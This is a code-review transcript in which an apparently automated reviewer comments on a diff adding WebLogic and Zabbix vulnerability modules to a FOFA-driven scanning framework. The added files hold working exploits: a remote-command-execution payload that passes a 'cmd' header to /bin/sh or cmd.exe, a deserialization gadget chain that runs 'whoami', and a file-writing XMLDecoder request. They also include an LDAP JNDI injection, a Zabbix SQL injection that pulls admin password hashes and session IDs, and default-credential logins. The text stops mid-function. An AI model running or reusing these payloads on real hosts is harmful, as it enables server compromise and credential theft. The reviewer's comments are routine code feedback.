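Review bot: In CVE_2014_4210.py the `requests.get` call sits outside the `try`, so the handler only wraps `r.status_code` comparisons that cannot raise, while connection errors and timeouts — the failures it is evidently meant to absorb — propagate to the caller. Move the request inside the `try` and narrow it to `except requests.RequestException:`; the bare `except` would otherwise also eat `KeyboardInterrupt`. `verify=False` is passed here without the `disable_warnings` call the sibling modules make at import, so every run prints an `InsecureRequestWarning`. The `else: pass` is dead, and a docstring should say that a 200 on `SearchPublicRegistries.jsp` only shows the page is reachable, not that the host is affected.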
@@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='CVE_2017_10271' +AUTHOR = "Faith" +REMARK = 'Weblogic XML Decoder反序列化漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### +def poc(target): + result={} + url = target + '/wls-wsat/CoordinatorPortType' + headers = {"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Upgrade-Insecure-Requests': '1', + 'Content-Type': 'text/xml'} + data = ''' + + + + + + servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt + xmldecoder_vul_test + + + + + + + ''' + r = requests.post(url,headers=headers,data=data,timeout=3) + url1 = target + '/wls-wsat/test.txt' + r1 = requests.get(url1,headers=headers,timeout=3) + try: + if 'xmldecoder_vul_test' in r1.text: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2018_2894.py b/Moudle/Weblogic/CVE_2018_2894.py new file mode 100644 index 0000000..0168e1e --- /dev/null +++ b/Moudle/Weblogic/CVE_2018_2894.py 
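Review bot: Both `requests.post` and `requests.get` are outside the `try`, so the handler only wraps the `in r1.text` test and network errors or timeouts escape to the caller; move the two calls inside and catch `requests.RequestException` rather than using a bare `except`. Neither request passes `verify=False`, even though the module disables `InsecureRequestWarning` at import — on an HTTPS target with a self-signed certificate the post fails before the check runs, whereas the sibling modules pass `verify=False` consistently. The response `r` from the post is never inspected. A docstring should state that this probe writes a file (`test.txt` under the wls-wsat deployment) on the target and does not remove it, so callers know the check is not side-effect free.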
@@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='CVE_2018_2894' +AUTHOR = "Faith" +REMARK = 'Weblogic任意文件上传漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url1 = target + '/ws_utc/login.do' + vuln_url2 = target + '/ws_utc/config.do' + headers = {"User-Agent":ua} + r1 = requests.get(vuln_url1,headers=headers,timeout=3) + r2 = requests.get(vuln_url2,headers=headers,timeout=3) + try: + if r1.status_code == 200 and r2.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url1'] = vuln_url1 + result['url2'] = vuln_url2 + return result + elif r1.status_code == 200 and r2.status_code !=200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url1 + return result + elif r1.status_code != 200 and r2.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url2 + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2019_2725.py b/Moudle/Weblogic/CVE_2019_2725.py new file mode 100644 index 0000000..f75ab2b --- /dev/null +++ b/Moudle/Weblogic/CVE_2019_2725.py 
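Review bot: The two `requests.get` calls are outside the `try`, so network errors escape while the handler guards only status-code comparisons that cannot raise; wrap the calls and use `except requests.RequestException:` instead of a bare `except`. The result dict has a different shape per branch (`url1`/`url2` in the first, `url` in the other two), which every consumer must special-case; collecting the reachable URLs into one list under a single `result['url']` key keeps the shape uniform. Neither call passes `verify=False` although warnings are suppressed at import. The module has no docstring explaining that a 200 on `/ws_utc/login.do` or `/ws_utc/config.do` only shows the console is exposed, not that the upload path is usable.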
@@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests + + +# 脚本信息 +###################################################### +NAME='CVE_2019_2725' +AUTHOR="RabbitMask" +REMARK='Weblogic RCE' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + + +VUL = ['CVE-2019-2725'] + + +def weblogic_10_3_6(ip): + headers = { + "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type": "text/xml", + "cmd": "%s" % ("whoami") + } + body = """ + + + + oracle.toplink.internal.sessions.UnitOfWorkChangeSet + -84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130973013951051101001011101167811710998101114730149511611497110115108101116731101001011209002195117115101831011141181059910111577101991049711010511510976025959799991011151156912011610111411097108831161211081011151041011011161160187610697118974710897110103478311611410511010359760119597117120671089711511510111511605976991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101477297115104116979810810159910109598121116101991111001011151160391916691069599108971151151160189176106971189747108971101034767108971151155976059511097109101113012604760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-1011603971081081121171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112001429-54-2-70-66000500-70100303470-727037
703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-90407699111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994768797759769911110947115117110471111141034797112979910410147120109108471051101161011141109710847100116109476884776512010511573116101114971161111145976991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108105116101114971161111141053769911110947115117110471111141034797112979910410147120109108471051101161011141109710847100116109476884776512010511573116101114971161111145910710497110100108101114106576991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122
97116105111110729711010010810111459101083111117114991017010510810110127197100103101116115461069711897120100117040105112111511111510111410597108471129712110811197100115471171161051084771971001031011161153683116117988411497110115108101116809712110811197100106499111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994711411711011610510910147659811511611497991168411497110115108101116102010697118974710511147831011141059710810512297981081011057991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947841149711011510810111669120991011121161051111101031121115111115101114105971084711297121108111971001154711711610510847719710010310111611510860991081051101051166210161069711897471089711010347841041141019710070421013991171141141011101168410411410197100102040417610697118974710897110103478410411410197100591204404510043046102711910198108111103105994711911111410747691201019911711610184104114101971007048101410310111667117114114101110116871111141071029404176119101981081111031059947119111114107478711111410765100971121161011145912050051100490521044119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111311710111511673109112108705410399109100805610910310111672101971001011141038407610697118974710897110103478311611410511010359417610697118974710897110103478311611410511010359120580591005506010111031011168210111511211111011510110494041761191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121085912062063100550641037166758066104511910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011151121111101151017310911210870681020115101116671049711497991161011146911099111100105110103102140761069711897471089711010347831161141051101035941861207007110069072102210310111683101114118108101116791171161121171168311611410197109105340417611910198108111103105994711510111411
81081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108591207407510069076103511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710970781022106971189747108971101034783116114105110103661171021021011147080100810341069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912083084100810851053258321310808710811611183116114105110103102040417610697118974710897110103478311611410511010359120890901008109112010071100790931049119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011167911711611211711683116114101971097310911210870951011119114105116101831161141019710910244076106971189747105111477311011211711683116114101971095941861209709810096099105102108117115104120101011100960102107111115461109710910180104101610697118974710897110103478312111511610110970106101110310111680114111112101114116121120108059100107010910161069711897471089711010347831161141051101037011110111161117611111910111467971151011201130901001120114103119105110801161089911111011697105110115102740761069711897471089711010347671049711483101113117101110991015941901201180119100112012010171069711897471089711010347821171101161051091017012210101031011168211711011610510910110214041761069711897471089711010347821171101161051091015912012401251001230126107991091003247993280-12810410112010199103940761069711897471089711010347831161141051101035941761069711897471089711010347801141119910111511559120-1260-1251001230-12410114798105110471151043245993280-12210221069711897471051114766117102102101114101100821019710010111470-120102510697118974710511147731101121171168311611410197109821019710010111470-11810171069711897471089711010347801141119910111511570-116101410310111673110112117116831161141019710910234041761069711897471051114773110112117116831161141019710959120-1140-113100-1150-112104240761069711897471051114773110112117116831161141019710959761
06971189747108971101034783116114105110103594186120100-110100-1170-10910194076106971189747105111478210197100101114594186120100-107100-1190-10610080-1041081141019710076105110101120-102090100-1190-10110910310111687114105116101114102340417610697118974710511147801141051101168711410511610111459120-990-98100690-97101910697118974710511147801141051101168711410511610111470-95105119114105116101120-93071100-940-9210191069711897471089711010347691209910111211610511111070-901031111171161021761069711897471051114780114105110116831161141019710959120-880-87901070-861019106971189747108971101034784104114111119979810810170-84100-8309110191069711897471051114780114105110116831161141019710970-81107112114105110116108110120-79071100-800-781015112114105110116831169799107841149799101120-76011100-830-751013831169799107779711284979810810110291211151111151011141059710847801191101011145253525156514952505556575750103176121115111115101114105971084780119110101114525352515651495250555657575059033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100047014000120100050150-710001019020020120006300030001-79000201300060100052014000320300010150-710000010210220100010230240202500040102601019027020120007300040001-79000201300060100056014000420400010150-710000010210220100010280290200010300310302500040102608041011010120011140701100118-8903176-72047-64049-74053-640551857-7406177-72047-64049-74053-64055-7406578451867-7407345-74077584254-6907989-6908189-7308244-740861888-74086-74092-73094-740100254-74010318105-7201105852551-91016255-74011518117-740121-10206-89033-720127-6908189-7308218-127-7408644-74086-74092-740-123586-89030-720127-6908189-7308218-121-7408644-74086-74092-740-123586-690-11989-690-11789256-740-1111867-730-108-730-105587158818-103589-89025-6908189-73082259-74086258-74086-74092589257-740-100895881-90-1-3145-740-96259-740-91-890245810-780-852510-740-82-740-772510-740-74-8903-79010940-70-40-89010-7300070093-10109060570112706970967011200229-402670-115-203270-119701127011221-102306
057011270697096701120170-8920020320002033017000100102035016091171130126013001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100060014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012609120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120 + + 
+ + """ + url = "%s/wls-wsat/CoordinatorPortType" % (ip) + rsp = requests.post(url, data=body, verify=False, headers=headers) + return rsp.status_code, rsp.text + + +def weblogic_12_1_3(ip): + headers = { + "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", + "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type": "text/xml" + } + body = ''' xxxx + + org.slf4j.ext.EventData + + + + + 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 + + + + + ResultBaseExec + + + + %s + + + + + + + + + + connectionHandler + true + + + + + + + + + + + + + + + + + + + + + + + + + + ''' % ("whoami") + url = "%s/wls-wsat/CoordinatorPortType" % (ip) + rsp = requests.post(url, data=body, verify=False, headers=headers) + return rsp.status_code, rsp.text + + + +def poc(target): + result={} + if weblogic_10_3_6(target)[0] == 200: + result['target'] = target + result['poc'] = NAME + return result + elif weblogic_12_1_3(target)[0] == 200: + result['target'] = target + result['poc'] = NAME + return result + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2020_16882.py b/Moudle/Weblogic/CVE_2020_16882.py new file mode 100644 index 0000000..01b4f9f --- /dev/null +++ b/Moudle/Weblogic/CVE_2020_16882.py 
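Review bot: `rsp = requests.post(url, data=body, verify=False, headers=headers)` in both `weblogic_10_3_6` and `weblogic_12_1_3` is the only request in this diff without a `timeout`, so one unresponsive host stalls a batch run indefinitely; `rsp = requests.post(url, data=body, verify=False, headers=headers, timeout=3)` matches the other modules. Neither helper handles `requests` exceptions, so `poc` propagates them to the caller rather than returning. `poc` decides on a bare HTTP 200 from `weblogic_10_3_6(target)[0]`, while the bodies it sends carry `whoami` in the `cmd` header and in the `%s` substitution — the command executes on the server but its output is never examined, so the execution is a pure side effect of what is only a status check; a non-executing probe would be the safer body for a detection module. `VUL = ['CVE-2019-2725']` is defined and never used.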
@@ -0,0 +1,41 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='CVE_2020_16882' +AUTHOR = "Faith" +REMARK = 'Weblogic未授权远程代码执行漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url = target + '/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29' + headers = {"User-Agent":ua} + data = ''' + GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1 + cmd: ls + Host: 127.0.0.1:7001 + ''' + r = requests.post(vuln_url, headers=headers,data=data,verify=False,timeout=3) + try: + if r.status_code ==200: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2021_2109.py b/Moudle/Weblogic/CVE_2021_2109.py new file mode 100644 index 0000000..e78b367 --- /dev/null +++ b/Moudle/Weblogic/CVE_2021_2109.py 
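Review bot: `import sys` is unused here and again in Weblogic_Console_Info_Leak; both should be dropped. The `data` body is a hard-coded raw HTTP request whose `cmd: ls` header makes the target execute a command, yet `poc` only looks at `r.status_code == 200` and never reads the response body, so the command runs as a side effect of a check that would work with a harmless body. As in CVE_2017_10271, the `requests.post` sits outside the `try`, so connection errors and the timeout propagate while the bare `except: pass` below catches nothing useful.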
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+
+import requests
+from requests.packages.urllib3.exceptions import InsecurePlatformWarning
+
+
+
+# 脚本信息
+######################################################
+NAME='CVE_2021_2109'
+AUTHOR="Faith"
+REMARK='Weblogic LDAP 远程代码执行漏洞'
+FOFA_RULE='app="Oracle-BEA-WebLogic-Server"'
+######################################################
+
+def poc(target):
+ result = {}
+ ldap_url = target
+ a = ldap_url.replace('http','ldap').replace('.',';',3).replace('7001','1389')
+ b = a.replace(';','.',2)
+
+ headers = {"UserAgent":"ua"}
+ url = target + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle('{}/Basic/WeblogicEcho;AdminServer')".format(b)
+ try:
+ requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
+ r = requests.get(url=url,headers=headers,verify=False,timeout=3)
+ if r.status_code == 200:
+ result['target'] = target
+ result['poc'] = NAME
+ result['url'] = url
+ return result
+ else:
+ pass
+ except:
+ pass
+
+if __name__ == '__main__':
+ poc("http://127.0.0.1")
\ No newline at end of file
diff --git a/Moudle/Weblogic/Weblogic_Console_Info_Leak.py b/Moudle/Weblogic/Weblogic_Console_Info_Leak.py
new file mode 100644
index 0000000..16e9ae6
--- /dev/null
+++ b/Moudle/Weblogic/Weblogic_Console_Info_Leak.py
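Review bot: `headers = {"UserAgent":"ua"}` sends the literal string `ua` under a header name that is not `User-Agent`; the sibling modules import `ua` from `Config.config_requests` and use the key `User-Agent`, so this reads as a copy error — `headers = {"User-Agent": ua}` plus the matching import. `disable_warnings(InsecurePlatformWarning)` silences a different warning class than the one `verify=False` triggers; the other modules pass `InsecureRequestWarning`. The `disable_warnings` call is also inside the `try` and inside `poc`, so it runs on every call rather than once at import like the rest of the files.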
@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+
+import sys
+import requests
+from Config.config_requests import ua
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+# 脚本信息
+######################################################
+NAME='Weblogic_Console_Info_Leak'
+AUTHOR = "Faith"
+REMARK = 'Weblogic控制台路径泄露'
+FOFA_RULE='app="Oracle-BEA-WebLogic-Server"'
+######################################################
+
+def poc(target):
+ result={}
+ vuln_url = target + '/console/login/LoginForm.jsp'
+ headers = {"User-Agent":ua}
+
+ r = requests.get(vuln_url, headers=headers,verify=False,timeout=3)
+ try:
+ if r.status_code == 200:
+ result['target'] = target
+ result['poc'] = NAME
+ result['url'] = vuln_url
+ return result
+ else:
+ pass
+ except:
+ pass
+
+
+if __name__ == '__main__':
+ poc("http://127.0.0.1")
\ No newline at end of file
diff --git a/Moudle/Zabbix/CVE_2016_10134.py b/Moudle/Zabbix/CVE_2016_10134.py
new file mode 100644
index 0000000..9a5a52d
--- /dev/null
+++ b/Moudle/Zabbix/CVE_2016_10134.py
@@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import re +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE_2016_10134' +AUTHOR="Joker" +REMARK='Zabbix SQL注入' +FOFA_RULE='title="zabbix"' +###################################################### + +def poc(target): + result = {} + #'检查是否存在 SQL 注入' + payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" + vuln_url1 = target + payload + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url1, headers=headers, verify=False, timeout=5) + if 'You have an error in your SQL syntax' in r1.text: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except Exception as e: + pass + +def exp(target): + # '尝试进行用户密码注入' + result ={} + passwd = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + session = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + payload2 = target + 
"/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + passwd + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + payload3 = target + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + session + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r2 = requests.get(url=payload2, headers=headers, verify=False, timeout=5) + r3 = requests.get(url=payload3, headers=headers, verify=False, timeout=5) + result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") + result2 = result_reg.findall(r2.text) + result3 = result_reg.findall(r3.text) + if result2: + print("[+]" + target ) + print("管理员 用户密码:" + result2[0]) + if result3: + print("Cookie SessionID:" + result3[0]) + else: + print("未成功利用") + + except Exception as e: + # print(e) + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Zabbix/Zabbix_Console_default_password.py b/Moudle/Zabbix/Zabbix_Console_default_password.py new file mode 100644 index 0000000..45b29ee --- /dev/null +++ b/Moudle/Zabbix/Zabbix_Console_default_password.py 
@@ -0,0 +1,57 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+import json
+import requests
+from Config.config_requests import ua
+
+requests.packages.urllib3.disable_warnings()
+
+# 脚本信息
+######################################################
+NAME='Zabbix_Console_default_password'
+AUTHOR="RabbitMask"
+REMARK='zabbix Console default password'
+FOFA_RULE='app="ZABBIX-监控系统"'
+######################################################
+
+def poc(target):
+ result={}
+ headers={
+ "User-Agent": ua,
+ 'Content-Type':'application/json',
+ }
+
+ data = {
+ "jsonrpc": "2.0",
+ "method": "user.login",
+ "params": {
+ "user": "Admin",
+ "password": "zabbix"
+ },
+ "id": 1
+ }
+
+ try:
+ r = requests.post(target+"/api_jsonrpc.php",headers=headers, data=json.dumps(data), verify=False,timeout=3)
+ if r.status_code==404:
+ rr = requests.post(target + "/zabbix/api_jsonrpc.php", headers=headers, data=json.dumps(data), verify=False, timeout=3)
+ if rr.status_code == 200 and 'result' in rr.text and 'error' not in rr.text:
+ result['target'] = target
+ result['poc'] = NAME
+ result['username'] = 'Admin'
+ result['password'] = 'zabbix'
+ return result
+ elif r.status_code ==200 and 'result' in r.text and 'error' not in r.text:
+ result['target'] = target
+ result['poc'] = NAME
+ result['username'] = 'Admin'
+ result['password']='zabbix'
+ return result
+ except:
+ pass
+
+
+
+if __name__ == '__main__':
+ poc("http://127.0.0.1/")
\ No newline at end of file
diff --git a/Output/README.md b/Output/README.md
new file mode 100644
index 0000000..388c120
--- /dev/null
+++ b/Output/README.md
@@ -0,0 +1 @@
+### 结果导出目录
\ No newline at end of file
diff --git a/Seek/fofaapi.py b/Seek/fofaapi.py
new file mode 100644
index 0000000..a01a931
--- /dev/null
+++ b/Seek/fofaapi.py
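Review bot: `requests.packages.urllib3.disable_warnings()` with no argument suppresses every urllib3 warning category, not only the `InsecureRequestWarning` that `verify=False` raises and that the other modules pass explicitly; name the class. The `__main__` example passes `"http://127.0.0.1/"` with a trailing slash while every other module passes none, and `target+"/api_jsonrpc.php"` then produces a `//` path; whatever normalises targets is outside this diff, so a comment stating the expected form of `target` (scheme, host, port, no trailing slash, presumably) would prevent the mismatch. The bare `except: pass` hides connection errors here as in the other modules.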
@@ -0,0 +1,38 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+
+import base64
+import requests
+
+from Config.config_decorators import Save_Csv
+from Config.config_api import FOFA_EAMIL, FOFA_API_KEY
+
+
+def fofaapi(keyword,num):
+ reslist=[]
+ bkeyword = bytes(keyword, encoding="utf8")
+ bs64 = base64.b64encode(bkeyword)
+ bs64 = bs64.decode()
+ res = requests.get('https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&fields=host,ip,port,country,city,server,title&size={}'.format(FOFA_EAMIL,FOFA_API_KEY,bs64,str(num)))
+ result = res.json()['results']
+ # print(result)
+ for i in result:
+ dic={}
+ dic['host'] = i[0]
+ dic['ip'] = i[1]
+ dic['port'] = i[2]
+ dic['country'] = i[3]
+ dic['city'] = i[4]
+ dic['server'] = i[5]
+ dic['title'] = i[6]
+ reslist.append(dic)
+ print(dic)
+ return reslist
+
+@Save_Csv
+def run(keyword,num):
+ return fofaapi(keyword,num)
+
+
+if __name__ == '__main__':
+ fofaapi('app="test"',3)
diff --git a/Tools/ReBuild.py b/Tools/ReBuild.py
new file mode 100644
index 0000000..ae3917c
--- /dev/null
+++ b/Tools/ReBuild.py
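Review bot: `res.json()['results']` raises `KeyError` whenever the API answers with an error object instead of a result set (bad credentials, exhausted quota), and `requests.get(...)` has no `timeout`; `res.raise_for_status()` followed by `res.json().get('results', [])` and a `timeout=` would make both failure modes explicit instead of a traceback out of the `Save_Csv` path. `FOFA_API_KEY` travels in the URL query string, so any log line, proxy record or exception text that echoes `res.url` leaks the key; keep the URL out of prints and error messages and treat the two config values as secrets in a comment above the import. `print(dic)` per row is debug output inside a library function and duplicates what `run`/`Save_Csv` presumably persist.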
@@ -0,0 +1,117 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import os +from importlib import import_module +from collections import Counter + +######################################################################################################################## +#pro +def get_moudle(): + dir = 'Moudle' #pro + # dir = '../Moudle' #dev + list=os.listdir(dir) + moudles=[] + for i in list: + if i !='__pycache__': + path = os.path.join(dir, i) + if os.path.isdir(path): + moudles.append(i) + return moudles + +def get_payload(moudle): + dir = 'Moudle/'+moudle #pro + # dir = '../Moudle/'+moudle #dev + list = os.listdir(dir) + payloads = [] + for i in list: + tmp=[] + path = os.path.join(dir, i) + if os.path.isfile(path): + if '.py' in i: + payload=i.replace('.py','') + tmp.append(payload) + tmp.append(get_remark(moudle,payload)) + payloads.append(tmp) + return payloads + +def get_remark(moudle,payload): + return import_module('Moudle.'+moudle+'.'+payload).REMARK + + + + + +def Rebuild(): + str="" + moudles=get_moudle() + MOUDLE_NUM = len(moudles) + PAYLOAD_NUM = 0 + for i in moudles: + str=str+("# {}\n".format(i)) + for j in get_payload(i): + str=str+("from Moudle.{} import {}\n".format(i,j[0])) + PAYLOAD_NUM=PAYLOAD_NUM+1 + str=str+("\n") + NUM="MOUDLE_NUM={}\nPAYLOAD_NUM={}\n\n".format(MOUDLE_NUM,PAYLOAD_NUM) + f=open('Moudle/Moudle_index.py','w') + 